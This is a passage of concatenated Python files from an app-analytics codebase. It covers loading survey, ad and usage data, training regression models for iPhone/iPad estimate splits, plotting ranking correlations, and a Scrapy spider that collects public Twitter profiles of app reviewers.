ACTIVE_USERS_COLUMNS = ['app_id', 'end_date', 'platform', 'device_type', 'country', 'users',
'sample_size', 'user_proportion', 'au_v2', 'au_v1', 'composition_dict',
'error', 'data_check1', 'change', 'data_check2', 'au_2_int', 'data_check3']
MDM_POPULATION_SIZE_DIR = MDM_BUCKET_PATH + 'PS_MONTH/'
MDM_POPULATION_SIZE_COLUMNS = ['bundle_id', 'end_date', 'platform', 'device_type', 'country', 'reporters_all']
MDM_ACTIVE_USERS_DIR = MDM_BUCKET_PATH + 'AU_MONTH/'
MDM_ACTIVE_USERS_COLUMNS = ['bundle_id', 'end_date', 'platform', 'device_type', 'country', 'mdm_v1']
MDM_USAGE_PENETRATION_DIR = MDM_BUCKET_PATH + 'UP_MONTH/'
MDM_USAGE_PENETRATION_COLUMNS = ['bundle_id', 'end_date', 'platform', 'device_type', 'country', 'proportion']
def load_adx(age_bins=AGE_BINS, age_labels=AGE_BIN_LABELS):
"""
Load all available AD-X data.
Note: age bin assignment is done by dividing average bin ages
of AD-X using the input parameters.
:param age_bins: Bins to use for pd.cut
:param age_labels: Labels to assign for pd.cut
:return: DataFrame with AD-X data.
"""
adx_paths = glob.glob(ADX_EXPRESSION)
adx = pd.concat([pd.read_table(p, names=ADX_COLUMNS, na_values=[None, 'None']) for p in adx_paths],
ignore_index=True)
adx = adx[adx['source'] == 'Facebook']
adx['date'] = pd.to_datetime(adx['datestr'])
# Assign AD-X bins to survey bins using average AD-X age in bin.
adx['age_bin'] = pd.cut((adx.age_to + adx.age_from) / 2, age_bins, labels=age_labels).astype('string')
# Account for nan's in is_male
adx['gender'] = np.nan
adx.loc[adx.is_male.notnull() & adx.is_male, 'gender'] = 'male'
adx.loc[~(adx.is_male.isnull() | adx.is_male), 'gender'] = 'female'
return adx.drop_duplicates(['device_id', 'source', 'age_from', 'age_to', 'is_male'])
def load_questionnaire(base_dir=QUESTIONNAIRE_DIR, app_name='VPN', age_bin_mapping=QUESTIONNAIRE_AGE_BIN_MAPPING):
"""
Load results of app questionnaire.
:param base_dir: root dir with questionnaire results
:param age_bin_mapping: Mapping to align age_bins (if None, keep original)
:return: DataFrame with questionnaire results
"""
questionnaire_paths = glob.glob(base_dir + app_name + '/*/*/part*')
df = pd.concat((pd.read_table(p, names=QUESTIONNAIRE_COLUMNS)
for p in questionnaire_paths), ignore_index=True)
df.dropna(subset=['answer', 'question_id'], inplace=True)
df = _parse_questionnaire(df)
# Remove devices with more than 1 distinct answer per question
# NB: Allows users to answer questions on different time points
n_answers = df.groupby(['device_id', 'question']).answer.nunique()
has_single_answers = (n_answers == 1).groupby(level=0).all()
valid_devices = has_single_answers[has_single_answers].index
df = df.loc[df.device_id.isin(valid_devices)]
df.sort(['device_id', 'bundle_id', 'question', 'date'], inplace=True)
df.drop_duplicates(['device_id', 'bundle_id', 'question'], take_last=True, inplace=True)
# Convert to wide format to align with AD-X.
questionnaire = pd.pivot_table(df, index=['device_id', 'bundle_id', 'source', 'country'],
columns='question', values='answer', aggfunc=lambda x: x)
questionnaire.rename(columns={'age': 'age_bin'}, inplace=True)
# Get one single date for a device.
max_device_date = df.groupby('device_id')['date'].max()
questionnaire = pd.merge(questionnaire.reset_index(), max_device_date.reset_index())
# Map age bins if mapping is given.
if age_bin_mapping:
questionnaire['age_bin'] = questionnaire.age_bin.map(age_bin_mapping)
return questionnaire
def _parse_questionnaire(df):
"""
Parse the questionnaire: map questions, answers, dates and countries.
:param df: DataFrame with raw questionnaire data.
:return: Parsed DataFrame
"""
reverse_mapper = lambda x: {m: k for k, v in x.items() for m in v}
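# e.g. {'male': ['Male', 'Männlich']} -> {'Male': 'male', 'Männlich': 'male'}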
# Map answers.
# Assume (naively) that the answer is either a single answer or that the part before
# the first whitespace is the answer.
df['answer'] = df.answer.str.split(' ').apply(lambda x: x[0])
df['answer'] = df.answer.str.replace('~', '-') # Japanese uses ~ instead of -
filter_values = ['$0 - $25,000', '\\N', 'Prefer not to say', 'Prefer', '$0']
valid_answers = filter_values + [i for l in QUESTIONNAIRE_INVERSE_ANSWER_MAPPING.values() for i in l]
unknown_answers = df.loc[~df.answer.isin(valid_answers), 'answer'].unique()
if unknown_answers.any():
warnings.warn("Removing unknown answers:\n{}".format(",".join(unknown_answers)), RuntimeWarning)
df['answer'] = df.answer.map(reverse_mapper(QUESTIONNAIRE_INVERSE_ANSWER_MAPPING))
df.dropna(subset=['answer'], inplace=True) # Remove invalid answers
# Map questions.
df['question'] = df.answer.map(reverse_mapper(QUESTIONNAIRE_INVERSE_QUESTION_MAPPING))
has_no_question = df.question.isnull()
if has_no_question.any():
answers_without_questions = df.loc[has_no_question, 'answer'].unique()
warnings.warn("Removing answers without questions: {}".format(",".join(answers_without_questions)),
RuntimeWarning)
df.dropna(subset=['question'], inplace=True) # Remove invalid questions
# Assign date and assign 'Unknown' to missing countries
df['date'] = pd.to_datetime(df['timestamp'], unit='ms')
df.country.fillna('Unknown', inplace=True)
return df
def load_facebook_insights(age_bins=AGE_BINS, age_labels=AGE_BIN_LABELS):
"""
Load Facebook Insights data.
:param age_bins: Bins to use for pd.cut
:param age_labels: Labels to assign for pd.cut
:return: DataFrame with AD-X data.
"""
facebook_paths = glob.glob(FB_INSIGHTS_EXPRESSION)
facebook = pd.concat([pd.read_table(p, names=FB_INSIGHTS_COLUMNS, parse_dates=[0]) for p in facebook_paths],
ignore_index=True)
# Assign bins to survey bins using average age in bin.
facebook['age_bin'] = pd.cut((facebook.age_to + facebook.age_from) / 2, age_bins, labels=age_labels)
facebook['gender'] = facebook.is_male.apply(lambda x: 'male' if x else 'female' if pd.notnull(x) else None)
notnull_data = facebook[facebook.gender.notnull() & facebook.age_bin.notnull()].copy()
data_groups = notnull_data.groupby(['date', 'bundle_id', 'age_bin', 'gender'])
return data_groups['count'].sum().reset_index()
def load_dpi_apps(dpi_date=datetime.datetime.now().date(), cols=['app_name', 'app_id', 'bundle_id', 'category'],
do_query_companies=False, **kwargs):
"""
Load DPI app info.
:param dpi_date: datetime.date with date to load data for
:param cols: Columns to keep from the DPI table
:param do_query_companies: Boolean indicating if company info should be retrieved from the DB
:param **kwargs: Keyword arguments for query_companies(), if querying companies:
- username: DB user name
- password: <PASSWORD>
:return: DataFrame with DPI app info
"""
path = (DPI_APPS_BASE_PATH + dpi_date.strftime('%Y-%m-%d') + '/part-m-00000.gz')
dpi_apps = pd.read_table(path, names=DPI_APPS_COLUMNS, compression='gzip')
dpi_apps = dpi_apps[cols]
if do_query_companies:
bundle_ids = dpi_apps.bundle_id.values
companies = query_companies(bundle_ids, **kwargs)
dpi_apps = pd.merge(dpi_apps, companies, how='left')
return dpi_apps.drop_duplicates(['bundle_id'])
def load_valid_zero_second_session_apps():
"""
Load valid zero second session apps
:return: List with bundle IDs
"""
return VALID_ZERO_SECOND_SESSION_APPS
def load_dpi_conflict_apps(dpi_conflict_path=DPI_CONFLICT_PATH, data_folder=DATA_FOLDER):
"""
Load all apps with DPI conflicts.
:param dpi_conflict_path: Path to csv file
:param data_folder: Path to data folder
:return: DataFrame with bundle IDs for iPhone and iPad
"""
return pd.read_csv(data_folder + dpi_conflict_path)
def query_companies(bundle_ids, username=None, password=None):
"""
Query companies for apps from DB.
:param bundle_ids: List of bundle ID's to query companies for
:param username: DB username
:param password: DB password
:return: DataFrame with company info
"""
assert username is not None and password is not None, "Username or password not specified"
aa_db = db.DB(username=username, password=password, hostname='ds-db-1.appannie.org',
dbname='aa', dbtype='postgres')
query = """
select
bundle_id,
company
from
aa_app
where
bundle_id in ('{bundle_ids}')
""".format(bundle_ids="','".join(bundle_ids))
companies = aa_db.query(query)
return companies
def load_usage(usage_path=USAGE_PATH, chunk_size=None, data_folder=DATA_FOLDER):
"""
Load usage data.
:param usage_path: Path to usage data
:param chunk_size: Number of lines in each chunk
:param data_folder: Path to data folder
:return: DataFrame with app used per device and date
"""
if chunk_size is None:
usage = pd.read_csv(data_folder + usage_path, delimiter='\t', names=USAGE_COLUMNS, usecols=USAGE_COLUMNS)
usage['date'] = pd.to_datetime(usage.datestr).dt.date
usage.drop('datestr', axis=1, inplace=True)
else:
# Prefix with data_folder, consistent with the non-chunked branch above
reader = pd.read_csv(data_folder + usage_path, delimiter='\t', names=USAGE_COLUMNS,
usecols=USAGE_COLUMNS, chunksize=chunk_size)
first_go = True
for tmp_df in reader:
tmp_df['date'] = pd.to_datetime(tmp_df.datestr).dt.date
tmp_df.drop('datestr', axis=1, inplace=True)
if first_go:
usage = tmp_df.copy()
first_go = False
else:
usage = pd.concat([usage, tmp_df], ignore_index=True)
return usage
def load_devices(date=None, bucket_path=SAMPLE_BUCKET_PATH, iso_code=ISO_CODE, begin_date=None):
"""
Load load_devices up to a date.
:param date: datetime.date (if None, uses yesterday)
:param bucket_path: path to bucket
:param iso_code: iso code to load data for
:param begin_date: datetime.date with first date to load data for (load all if None)
:return: DataFrame with info of load_devices
"""
# Select first valid date for country (to remove testing devices, etc.).
if begin_date:
begin_datestr = begin_date.strftime('%Y%m%d')
else:
if iso_code == 'US':
begin_datestr = '20141023'
elif iso_code == 'GB':
begin_datestr = '20150813'
else:
raise Exception("Unsupported iso_code: {}".format(iso_code))
if date is None:
date = datetime.datetime.now().date() - datetime.timedelta(days=1)
end_datestr = date.strftime('%Y%m%d')
temp = import_data.import_data(begin_datestr, end_datestr, 'device_info',
bucketdir=bucket_path, iso_code=iso_code)
return temp.drop_duplicates('device_id', take_last=True)
def load_active_devices(start_date, end_date, data_folder=DATA_FOLDER):
"""
Load active devices from file for a time period. Time period can be a week or a month.
:param start_date: datetime.date
:param end_date: datetime.date
:param data_folder: Path to data folder
:return: Series with active devices
"""
next_period_start = (end_date + datetime.timedelta(days=1))
# Determine whether to load monthly or weekly active devices.
if start_date == next_period_start.replace(month=start_date.month, year=start_date.year):
time_frame = 'monthly'
elif ((end_date - start_date).days + 1) == 7:
time_frame = 'weekly'
else:
raise Exception('Unsupported time period')
active_devices_path = data_folder + ACTIVE_PATH.format(time_frame=time_frame)
all_active_devices = pd.read_table(active_devices_path, names=ACTIVE_COLUMNS, parse_dates=[0])
if not (all_active_devices.end_date == end_date).any():
raise Exception('end_date not in file')
active_devices = all_active_devices[all_active_devices.end_date == end_date]
return active_devices['device_id'].reset_index(drop=True).copy()
def load_all_active_devices(time_frame, data_folder=DATA_FOLDER):
"""
Load all active devices for a given time frame.
:param time_frame: 'weekly' or 'monthly'
:param data_folder: Path to data folder
:return: DataFrame with end_date and device_id
"""
assert time_frame in ('weekly', 'monthly'), ('Unknown time frame: %s' % time_frame)
active_devices_path = data_folder + ACTIVE_PATH.format(time_frame=time_frame)
active_devices = pd.read_table(active_devices_path, names=ACTIVE_COLUMNS, parse_dates=[0])
active_devices.end_date = active_devices.end_date.dt.date
return active_devices
def load_probabilities(base_dir=PROBABILITIES_DIR):
"""
Load estimated probabilities per device.
:param base_dir: root dir in which device probabilities are stored per time interval
:return: DataFrame with probabilities per device
"""
sub_dirs = glob.glob(base_dir + '*')
probabilities = pd.DataFrame()
for sub_dir in sub_dirs:
files = glob.glob(sub_dir + '/part*')
data = pd.DataFrame()
for proba_file in files:
data_file = pd.read_table(proba_file, names=PROBABILITIES_COLUMNS)
data = data.append(data_file, ignore_index=True)
data['end_date'] = datetime.datetime.strptime(sub_dir, base_dir + '%Y-%m-%d')
probabilities = probabilities.append(data, ignore_index=True)
proba_df = pd.DataFrame.from_dict([ast.literal_eval(i) for i in probabilities.gender_dict.values])
probabilities[proba_df.columns] = proba_df
probabilities = probabilities[probabilities.columns[probabilities.columns != 'gender_dict']]
return probabilities
def load_active_users(time_frame, base_dir=ACTIVE_USERS_DIR):
"""
Load active users per app.
:param time_frame: Time Frame to load ('weekly' or 'monthly')
:param base_dir: root dir in which active users are stored per time interval
:return: DataFrame with active users per app
"""
def load_table(p):
df = pd.read_table(p, parse_dates=[1], names=ACTIVE_USERS_COLUMNS)
df.dropna(how='all', axis=1, inplace=True)
return df if df.shape[1] == len(ACTIVE_USERS_COLUMNS) else None
if time_frame == 'weekly':
data_dir = base_dir.format(time_frame='WEEK')
elif time_frame == 'monthly':
data_dir = base_dir.format(time_frame='MONTH')
else:
raise Exception('Unknown time frame %s' % time_frame)
print 'Data Directory', data_dir
active_users_paths = glob.glob(data_dir + '*/US/part*')
print 'Active Users Path:', active_users_paths
active_users = pd.concat([load_table(p) for p in active_users_paths], ignore_index=True)
composition = pd.DataFrame.from_dict([ast.literal_eval(i) for i in
active_users.composition_dict.values])
active_users[composition.columns] = composition
return active_users.drop('composition_dict', axis=1)
def load_mdm_data(country='US', version=None, base_dir=MDM_POPULATION_SIZE_DIR, headers=MDM_POPULATION_SIZE_COLUMNS):
"""
Load MyDM data.
Requires following file structure:
base_dir/version/country/filename
:param country: country for which data is retreived
:param base_dir: root dir in which active users are stored per time interval
:param headers: headers of the selected mdm data table
:return DataFrame with mdm data
"""
if version is None:
version = '*'
def _build_path(row):
return '/'.join([row['root'], row['version'], row['date'], row['country'], row['fname']])
columns = headers
files = glob.glob(base_dir+version+'/*/'+country+'/*')
files_df = pd.DataFrame([x.rsplit('/', 4) for x in files], columns=['root', 'version', 'date', 'country', 'fname'])
# Finding the latest version is tricky; revisit this logic if versioning changes
grouped = files_df.groupby('date', as_index=False).agg({'version': 'max'}).rename(columns={'version': 'latest_version'})
files_df = pd.merge(files_df, grouped, on=['date'])
files_df = files_df[files_df['version'] == files_df['latest_version']]
files_df['path'] = files_df.apply(_build_path, axis=1)
files = files_df.path.tolist()
data = pd.DataFrame()
for au_file in files:
data_file = pd.read_table(au_file, parse_dates=[1], header=-1)
data_file.columns = columns
data = data.append(data_file, ignore_index=True)
return data
def load_mdm_penetration(country='US'):
"""
Load monthly penetration per app based on MyDM data.
:param country: country for which data is retrieved
"""
if country == 'WW':
# Vancouver team has implemented different logic to calculate WW usage penetration
au_penetration = load_mdm_data(country=country, base_dir=MDM_USAGE_PENETRATION_DIR, headers=MDM_USAGE_PENETRATION_COLUMNS)
else:
all_reporters = load_mdm_data(country=country, version='v1.0.0')
penetrations = load_mdm_data(country=country, version='v1.0.0', base_dir=MDM_USAGE_PENETRATION_DIR, headers=MDM_USAGE_PENETRATION_COLUMNS)
au_penetration = pd.merge(all_reporters, penetrations, on=['bundle_id', 'end_date', 'platform', 'device_type', 'country'])
au_penetration['reporters_app'] = au_penetration['reporters_all'] * au_penetration['proportion']
mdm_v1 = load_mdm_data(country=country, version='v1.1.0', base_dir=MDM_ACTIVE_USERS_DIR, headers=MDM_ACTIVE_USERS_COLUMNS)
au_penetration = pd.merge(au_penetration, mdm_v1, on=['bundle_id', 'end_date', 'platform', 'device_type', 'country'])
return au_penetration
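# Example (US): the returned frame has one row per bundle/month/device type with
# reporters_all, proportion, the derived reporters_app, and the v1.1.0 mdm_v1
# active-user figure merged in.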
<file_sep>/aa_au_model/lib/__init__.py
__author__ = 'hkoekkoek'
<file_sep>/universals/train_reg_models.py
'''
Created on Jun 6, 2013
@author: perezrafael
'''
import pandas as pd
import numpy as np
import os
import matplotlib.pyplot as plt
import config
from sklearn import linear_model
import pickle
from sklearn.svm import SVR
import matplotlib as mpl
def load_values(path, store_ids=None, units=None, feed_ids=None):
df = pd.DataFrame()
for (dirpath, dirnames, filenames) in os.walk(path):
for filename in filenames:
if filename.endswith('.csv'):
f_data = filename.split('_')
s_id = np.int64(f_data[0])
unit = f_data[1].lower()
try:
f_id = np.int64(f_data[1])
except:
f_id = None
if units is not None and unit not in units:
continue
if store_ids is not None and s_id not in store_ids:
continue
if feed_ids is not None and f_id not in feed_ids:
continue
dfb = pd.read_csv(os.sep.join([dirpath, filename]))
dfb['store_id'] = s_id
if f_id is None:
dfb['unit'] = unit
df = df.append(dfb)
return df
def get_low_error_apps(estimates, actuals, max_error):
usd = estimates[(estimates['feed_id']==2) | (estimates['feed_id']==102)].drop('feed_id', axis=1)
usd = usd.groupby(['date', 'app_id']).sum().reset_index()
usd['unit'] = 'usd'
df = actuals.merge(usd, on=['app_id', 'date', 'store_id', 'unit'])
df['rel_error'] = (df['units'] - df['estimate']).abs() / df['units']
df = df[df['rel_error']<=max_error][['date', 'app_id']].drop_duplicates()
return df
def reshape_to_ranks(df):
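# Pair iPhone and iPad rows for the same app/date/store/category: free (0 vs
# 101), paid (1 vs 100), grossing (2 vs 102); the merge suffixes produce
# rank_iphone/rank_ipad and estimate_iphone/estimate_ipad columns.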
free = pd.merge(df[df['feed_id']==0], df[df['feed_id']==101], on=['date', 'app_id', 'store_id', 'category_id'], suffixes=['_iphone', '_ipad'])
paid = pd.merge(df[df['feed_id']==1], df[df['feed_id']==100], on=['date', 'app_id', 'store_id', 'category_id'], suffixes=['_iphone', '_ipad'])
grossing = pd.merge(df[df['feed_id']==2], df[df['feed_id']==102], on=['date', 'app_id', 'store_id', 'category_id'], suffixes=['_iphone', '_ipad'])
df = pd.concat([free, paid, grossing]).drop('feed_id_ipad', axis=1)
df.rename(columns={'feed_id_iphone':'feed_id'}, inplace=True)
return df
def plot_error_by_category(df):
df = df.groupby(['store_id', 'feed_id'])
for n, g in df:
ax = g.boxplot(column='rel_error', by='category_id')
labels = []
for tick in ax.xaxis.get_major_ticks():
tick.label.set_rotation('vertical')
labels.append(config.IOS_CATEGORIES_DICT[int(tick.label.get_text())])
ax.set_xticklabels(labels)
ax.set_ylabel('relative_error')
country = config.IOS_STORES_DICT[n[0]]
feed = config.IOS_FEEDS_DICT[n[1]].replace('IPHONE_', '')
ax.set_title('%s_%s'%(country, feed))
ax.set_ylim(0, 1.0)
plt.savefig('%s/relative_error_%s_%s_%s.png'%(plots_dir, month, country, feed))
def plot_count_by_error(df):
df = df[df['rel_error']<=1]
df = df.groupby(['store_id', 'feed_id', 'category_id'])
for n, g in df:
g.hist(column='rel_error')
country = config.IOS_STORES_DICT[n[0]]
feed = config.IOS_FEEDS_DICT[n[1]].replace('IPHONE_', '')
category = config.IOS_CATEGORIES_DICT[n[2]]
plt.title('%s_%s_%s'%(country, category, feed))
plt.ylabel('count')
plt.xlabel('relative_error')
#plt.show()
plt.savefig('%s/error_count_%s_%s_%s_%s.png'%(plots_dir, month, country, category, feed))
def gen_reg_models(df):
df = df.groupby(['store_id', 'feed_id', 'category_id'])
models = pd.DataFrame()
for n, g in df:
country = config.IOS_STORES_DICT[n[0]]
feed = config.IOS_FEEDS_DICT[n[1]].replace('IPHONE_', '')
category = config.IOS_CATEGORIES_DICT[n[2]]
x = g[['rank_iphone', 'rank_ipad']].values
y = g['iphone_ratio'].values
regr = linear_model.LinearRegression()
regr.fit(x, y)
params = regr.coef_
c = regr.intercept_
score = None
try:
score = regr.score(x,y)
except:
pass
model = {'store_id': [n[0]],
'feed_id': [n[1]],
'category_id': [n[2]],
'iphone_param': [params[0]],
'ipad_param': [params[1]],
'constant': [c],
'split_score':[score],
'train_samples':[g.shape[0]]
}
model = pd.DataFrame(model)
models = models.append(model)
#plt.plot(x[:,0], y, 'o', label='Original data')
#plt.plot(x[:,0], regr.predict(x), 'o', label='Fitted line')
#plt.title('%s_%s_%s_%s'%(country, category, feed, regr.score(x,y)))
#plt.show()
return models
def plot_ratios(df, month=None):
df = df.groupby(['store_id', 'category_id', 'feed_id'])
for n, g in df:
plt.clf()
fig = plt.figure()
ax = fig.add_subplot(111)
country = config.IOS_STORES_DICT[n[0]]
feed = config.IOS_FEEDS_DICT[n[2]].replace('IPHONE_', '')
category = config.IOS_CATEGORIES_DICT[n[1]]
if month==None:
title='%s_%s_%s.png'%(country, category, feed)
else:
title='%s_%s_%s_%s.png'%(month, country, category, feed)
plt.scatter(g['rank_iphone'], g['rank_ipad'], c=g['iphone_ratio'], s=50, cmap=mpl.cm.hot_r)
ax.set_title(title+ ' count=%s'%g.shape[0])
ax.set_xlabel('iPhone Ranks')
ax.set_ylabel('iPad Ranks')
ax.grid()
#ax.set_xscale('log')
#ax.set_yscale('log')
plt.ylim(0, 500)
plt.xlim(0, 1000)
cbar = plt.colorbar()
cbar.set_label(r'iPhone Ratio')
plt.savefig('./plots/%s'%title)
#plt.show()
def train_models(df, algorithm):
df = df.groupby(['store_id', 'category_id', 'feed_id'])
models = {}
for n, g in df:
model = None
try:
model = algorithm.fit(g[['rank_iphone', 'rank_ipad']], g['iphone_ratio'])
except:
pass
models[n] = model
return models
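# Usage sketch (hypothetical key): models is keyed by
# (store_id, category_id, feed_id) tuples, so a fitted split can be queried as
#   m = models[(143441, 6014, 0)]
#   m.predict([[50, 30]])  # iphone_ratio for rank_iphone=50, rank_ipad=30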
if __name__ == '__main__':
plots_dir = 'plots'
model = 'ios_monthly'
month = '2013-07'
#algorithm = SVR(kernel='rbf', C=1e3, gamma=0.1)
algorithm = linear_model.LinearRegression()
algo_name = 'linear'
store_id = None
unit = None
feed_id = None
#store_id = [143465]
#unit = ['usd']
#feed_id = [2,102]
main_dir = '/home/rafael/appannie/data_science/evaluation/data/%s/%s'%(model, month)
estimates_dir = '%s/est_daily_raw'%main_dir
actuals_dir = '%s/real_daily_raw'%main_dir
estimates = load_values(estimates_dir, store_ids=store_id, feed_ids=feed_id)
actuals = load_values(actuals_dir, store_ids=store_id, units=unit)
estimates['store_id'] = np.int64(estimates['store_id'])
actuals['store_id'] = np.int64(actuals['store_id'])
estimates = reshape_to_ranks(estimates)
estimates = estimates.merge(actuals, on=['app_id', 'date', 'store_id'])
estimates['sum_estimate'] = estimates['estimate_iphone'] + estimates['estimate_ipad']
estimates['rel_error'] = (estimates['units'] - estimates['sum_estimate']).abs() / estimates['units']
estimates['iphone_ratio'] = (1.0*estimates['estimate_iphone']) / estimates['sum_estimate']
estimates['ipad_ratio'] = 1.0 - estimates['iphone_ratio']
estimates = estimates[estimates['estimate_iphone']>0]
estimates = estimates[estimates['estimate_ipad']>0]
estimates = estimates[estimates['rel_error']<0.05].drop_duplicates()
estimates = estimates.reindex_axis(['app_id', 'date', 'store_id', 'category_id', 'feed_id', 'unit', 'rank_iphone', 'rank_ipad', 'estimate_iphone', 'estimate_ipad', 'sum_estimate', 'units', 'rel_error', 'iphone_ratio', 'ipad_ratio'], axis=1)
#estimates.to_csv('shaped_estimates.csv', index=False)
#plot_ratios(estimates, month)
models = train_models(estimates, algorithm)
with open('%s_models_%s.pk'%(algo_name, month), 'wb') as output:
pickle.dump(models, output, pickle.HIGHEST_PROTOCOL)
#plot_error_by_category(estimates)
#plot_count_by_error(estimates)
#gen_reg_models(estimates).to_csv('reg_models_%s.csv'%(month), index=False)
<file_sep>/audience/twitter-scraping/lib/__init__.py
__author__ = 'hgriffioen'
<file_sep>/ranking_change/correlations_plotter.py
#!/usr/bin/env python
import pandas as pd
import os
import matplotlib.dates as mdates
import matplotlib.pyplot as plt
import datetime as dt
import config
import matplotlib.cm as cm
from itertools import cycle
import numpy as np
import gc
overall_categories = ['Overall',
'Games',
'Business',
'Weather',
'Utilities',
'Travel',
'Sports',
'Social Networking',
'Reference',
'Productivity',
'Photo and Video',
'News',
'Navigation',
'Music',
'Lifestyle',
'Health and Fitness',
'Finance',
'Entertainment',
'Education',
'Books',
'Medical',
'Newsstand',
'Food and Drink']
games_categories = ['Overall',
'Games',
'Action',
'Adventure',
'Arcade',
'Board',
'Card',
'Casino',
'Dice',
'Educational',
'Family',
'Kids',
'Music',
'Puzzle',
'Racing',
'Role Playing',
'Simulation',
#'Sports',
'Strategy',
'Trivia',
'Word']
def add_f_date(df):
df2 = df[['date']].drop_duplicates()
df2['f_date'] = [dt.datetime.strptime(d,'%Y-%m-%d').date() for d in df2['date']]
df = df.merge(df2, on='date')
return df
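# Example: add_f_date turns the string column date='2013-09-10' into a
# datetime.date stored in f_date, which matplotlib's date locators and
# formatters below can consume directly.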
def plot_multi_category_correlations(df, name='overall'):
gdf = df.groupby(['Country', 'Market', 'Type', 'value_type', 'rank_limit'])
for n,g in gdf:
gc.collect()
fn = 'plots/corr_multi/correlation_%s_%s.png'%(name, '_'.join(map(str, n)))
plt.clf()
fig = plt.figure(figsize=(36,12))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
gdf2 = g.groupby(['Category'])
p = []
categories = []
lines = ["-","--","-.",":"]
linecycler = cycle(lines)
colors = iter(cm.rainbow(np.linspace(0, 1, len(gdf2))))
for n2, g2 in gdf2:
pa, = plt.plot(g2['f_date'].values, g2['corr'], next(linecycler), linewidth=3, color=next(colors))
p.append(pa)
categories.append(n2)
plt.gcf().autofmt_xdate()
ax.grid()
ax.legend(p, categories, loc='center left', bbox_to_anchor=(1, 0.5))
plt.title(str(n))
plt.savefig(fn)
plt.close()
#plt.show()
def plot_correlations(df):
for n, g in df.groupby(['Country', 'Market', 'Type', 'Category', 'value_type', 'rank_limit']):
gc.collect()
fn = 'plots/corr_single/correlation_%s.png'%('_'.join(map(str, n)))
print fn
if os.path.exists(fn):
continue
plt.clf()
#fig = plt.figure()
#fig = plt.figure(figsize=(36,12))
fig = plt.figure(figsize=(int(len(g['date'])/2),6))
ax = fig.add_subplot(111)
plt.gca().xaxis.set_major_formatter(mdates.DateFormatter('%Y-%m-%d'))
plt.gca().xaxis.set_major_locator(mdates.DayLocator())
plt.plot(g['f_date'].values, g['corr'], linewidth=3)
plt.gcf().autofmt_xdate()
ax.grid()
plt.ylim(-1.0, -0.4)
plt.title(str(n))
plt.savefig(fn)
plt.close()
#@profile
def main():
df = pd.read_csv('/Users/perezrafael/appannie/data/corr-results-1378781934.9.csv')
df['Country'] = df['store_id'].apply(lambda x: config.IOS_STORES_DICT[x])
del df['store_id']
df['Category'] = df['category_id'].apply(lambda x:config.IOS_CATEGORIES_DICT[x])
del df['category_id']
df['Type'] = df['feed_id'].apply(lambda x: config.IOS_TYPES_DICT[x])
df['Market'] = df['feed_id'].apply(lambda x: config.IOS_MARKETS_DICT[x])
del df['feed_id']
df = df[df['rank_transform_name']=='log']
del df['rank_transform_name']
df = df[df['value_transform_name']=='log']
del df['value_transform_name']
df = df[df['rank_limit']==300]
df = df[df['Category']!='Sports']
#df = df[df['Country']=='United Kingdom']
df = add_f_date(df)
plot_multi_category_correlations(df[df['Category'].isin(overall_categories)], 'overall')
plot_multi_category_correlations(df[df['Category'].isin(games_categories)], 'games')
plot_correlations(df)
if __name__ == '__main__':
main()
<file_sep>/audience/twitter-scraping/lib/scraper/scraper/spiders/twitter.py
import pandas as pd
import scrapy
from ..constants import FIELD_PATHS
from ..items import ScraperItem
from scrapy.shell import inspect_response
from scrapy import Request
class TwitterSpider(scrapy.Spider):
"""
    Spider for scraping Twitter profiles. Gets the user handles to scrape from the file reviewers.csv. Specify a
    different file using the option -a filename=example_file.csv.
Examples:
- scrapy crawl twitter -a filename=test.csv -o output_test.csv
"""
name = "twitter"
allowed_domains = ["twitter.com"]
base_url = 'https://twitter.com/'
start_urls = ()
    def __init__(self, filename='reviewers.csv', *args, **kwargs):
        super(TwitterSpider, self).__init__(*args, **kwargs)
        df = pd.read_csv(filename, index_col=False)
        self.reviewers = df.reviewer.tolist()
def start_requests(self):
"""
Generate requests from the list of reviewers.
:return: Request objects
"""
for reviewer in self.reviewers:
yield Request(self.base_url + str(reviewer).replace(' ', ''))
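    # A minimal sketch of the FIELD_PATHS shape assumed by parse() below; the
    # real mapping lives in ..constants and may differ. Keys are item fields,
    # values are XPath expressions, e.g. (hypothetical):
    # FIELD_PATHS = {'name': '//h1[contains(@class, "ProfileHeaderCard-name")]//a/text()'}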
def parse(self, response):
"""
Parse the response using the field paths given in constants.FIELD_PATHS.
:param response: Response object
:return: ScraperItem
"""
item = ScraperItem()
for field, path in FIELD_PATHS.iteritems():
field_data = response.xpath(path).extract()
item[field] = field_data[0] if len(field_data) == 1 else ''
yield item<file_sep>/evaluation/py/gen_benchmark_data_ios.py
'''
Created on Oct 18, 2013
@author: perezrafael
'''
import sys
import os
import pandas as pd
import zipfile
import StringIO
import datetime as dt
import matplotlib.dates as mdates
import psycopg2
import matplotlib.cm as cm
import numpy as np
import bz2
import datetime
import config
import itertools
from sklearn.cross_validation import KFold
from scipy import optimize
import bz2
start_date = datetime.date(2013, 7, 1)
end_date = datetime.date(2013, 8, 1)
#DB_ACTUALS_STRING = 'dbname=aa_staging user=aa host=nile'
#DB_EVENTS_STRING = 'dbname=aa user=aa host=nile'
DB_ACTUALS_STRING = 'dbname=aa_staging user=aa host=10.38.48.144 port=5432'
DB_EVENTS_STRING = 'dbname=aa user=aa host=10.38.48.134 port=6432'
#COMPRESSED_RANKING_FILES_PATH = '/Users/perezrafael/appannie/data/ranks' if len(sys.argv) != 2 else sys.argv[1]
COMPRESSED_RANKING_FILES_PATH = '/mnt/data/ranks' if len(sys.argv) != 2 else sys.argv[1]
if not os.path.isdir(COMPRESSED_RANKING_FILES_PATH):
print 'Expecting compressed ranking files in directory %s' % COMPRESSED_RANKING_FILES_PATH
print 'You can specify it in sys.argv[1]'
sys.exit(2)
OUT_DIR='../data'
CONN = None
def get_connection(conn_string):
global CONN
if CONN is None:
CONN = psycopg2.connect(conn_string)
return CONN
iphone_ranks = pd.DataFrame({'iphone_rank': np.arange(1, 1001)})
ipad_ranks = pd.DataFrame({'ipad_rank': np.arange(1, 401)})
rank_range_limits = {20: [1, 20],
60: [21, 60],
200: [61, 200],
1000: [201, 10000]}
ipad_feeds = {'100': '1',
'101': '0',
'102': '2'}
reverse_ipad_feeds = {'1': '100',
'0': '101',
'2': '102'}
#@profile
def train_models(df, feed_id, device_rank, other_device_rank, actual_type):
def fitfunc1(p, x):
r = p[0] * (x[:,0] ** p[1])
return r
def errfunc1(p, x, y):
r = fitfunc1(p, x) - y
return r
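    # fitfunc1 is a power-law rank-to-value curve, value = a * rank**b; only
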